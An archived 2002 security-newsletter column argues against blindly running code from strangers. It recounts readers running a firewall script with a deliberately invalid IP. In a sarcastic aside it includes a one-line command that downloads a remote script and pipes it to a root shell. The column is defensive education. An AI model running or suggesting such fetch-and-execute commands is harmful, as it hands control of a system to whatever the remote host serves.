Information Security News mailing list archives

Previous By Date Next
Previous By Thread Next

Vet the code or pay the price

From: InfoSec News <isn () c4i org>
Date: Wed, 23 Oct 2002 01:02:01 -0500 (CDT)
+------------------------------------------------------------------+
|  Linux Security: Tips, Tricks, and Hackery                       |
|  Published by Onsight, Inc.                                      |
|                                                                  |
|  22-October-2002                                                 |
|  http://www.hackinglinuxexposed.com/articles/20021022.html       |
+------------------------------------------------------------------+

This issue sponsored by: Hacking Linux Exposed

Learn how to think like an attacker in order to secure your Linux
network.

In the ever-changing world of global data communications, inexpensive
Internet connections, and fast-paced software development, security
is constantly being compromised. Linux has always been considered the
digital playground for crackers. Many hacks, exploits, and network
security tools are written on Linux because it's readily available.
Hacking Linux Exposed: Linux Security Secrets & Solutions shows you,
step-by-step, how to defend against the latest Linux attacks by
understanding the hacker's methods and sinister thought processes.

For more information, visit http://www.hackinglinuxexposed.com/

--------------------------------------------------------------------

Vet the code or pay the price
By Brian Hatch

Summary: Too many people blindly execute commands from anonymous
strangers without checking to see what lays hidden, and leave
themselves open to malicous attacks.

The Internet and it's myriad mailing lists can offer a wealth of help
and assistance when you have problems. When asking what obscure
OpenSSL command you need convert your X509 certificate from .cer to
.pem format you'll likely get an answer[1] from someone you've never
met. When trying to fix your Apache configuration to block access to
all .htaccess files, someone will provide a snippet[2] of
configuration that can help you out.

Unfortunately, many people blindly copy and paste the suggestions
without analysing what they're given. In the best scenario, the
commands will not work and may leave you thinking you'd fixed your
problem. In the worst case, you may have been given a trojan that
will break the security of your own system and hand it to the
cracker. This sort of trick is common on security lists where someone
posts 'exploit code' to test your software but actually binds a
rootshell or deletes your files.

Although most folks claim never to trust code from unknown sources, I
can still tell that this happens every day. For example two weeks ago
in this column I showed you how you could create a simple but
effective firewall in 10 minutes[3]. The column included a shell
script you could run with minimal changes. The top of the script read
as follows:

  # Definitions
  EXT_INTERFACE=eth1
  EXT_IP=300.3.3.3
  INT_INTERFACE=eth0
  INT_IP=192.168.1.1

The IP address I used was 300.3.3.3. Anyone who's played with IP much
will see that this doesn't make sense. The bytes in a valid IP
address range between 0 and 255. [4] By choosing 300, I guarenteed
that this script would blow up if anyone tried to run it unaltered.

And run it they did. I received five emails from folks telling me
that the code didn't work, and that they got errors because of the
invalid IP address.[5] I get these type of complaints frequently.

(The other kind of mail I get frequently contains little more than 'I
need a program that will let me break into my friends computer. Send
it to me now!'. I get this so much that I thought I'd help out by
providing the following which must, sadly, be run as root:

 lynx --source http://www.hackinglinuxexposed.com/auto-hack-script.f?IP | sh

You must replace 'IP' with the IP or hostname you'd like to attack.)

Hopefully I don't need to explain any further why you shouldn't
blindly run code from others. Next week I'll explain the methods I
use when writing examples to help keep others from accidentally
running my commands as-is.

NOTES:

[1] openssl x509 -in file.cer -inform d -out file.pem

[2] You'd use:
   <Files ~ "^\.ht">
      Order allow,deny
      Deny from all
   </Files>

[3] http://www.hackinglinuxexposed.com/articles/20021008.html

[4] Of course the values 0 and 255 are not available in some cases.
The first and last IP addresses in your range are reserved for the
network address and the broadcast address, respectively. Some routers
still do not let you use 0 or 255 as an octet, even when the netmask
makes it clear it is not a network or broadcast address.

[5] *Hobbit* went so far to refer to this article as '10 minute error
fodder' because of the illegal IP used throughout.

                            -------------                            
Brian Hatch is Chief Hacker at Onsight, Inc and author of Hacking
Linux Exposed and Building Linux VPNs. He doesn't trust code that
anyone sends him, and certainly nothing he provides to himself. Brian
can be reached at brian () hackinglinuxexposed com.

--------------------------------------------------------------------
This newsletter is distributed by Onsight, Inc.

The list is managed with MailMan (http://www.list.org). You can
subscribe, unsubscribe, or change your password by visiting
http://lists.onsight.com/ or by sending email to
linux_security-request () lists onsight com.

Archives of this and previous newsletters are available at
http://www.hackinglinuxexposed.com/articles/

--------------------------------------------------------------------

Copyright 2002, Brian Hatch.



-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomo () attrition org with 'unsubscribe isn'
in the BODY of the mail.
Previous By Date Next
Previous By Thread Next

Current thread: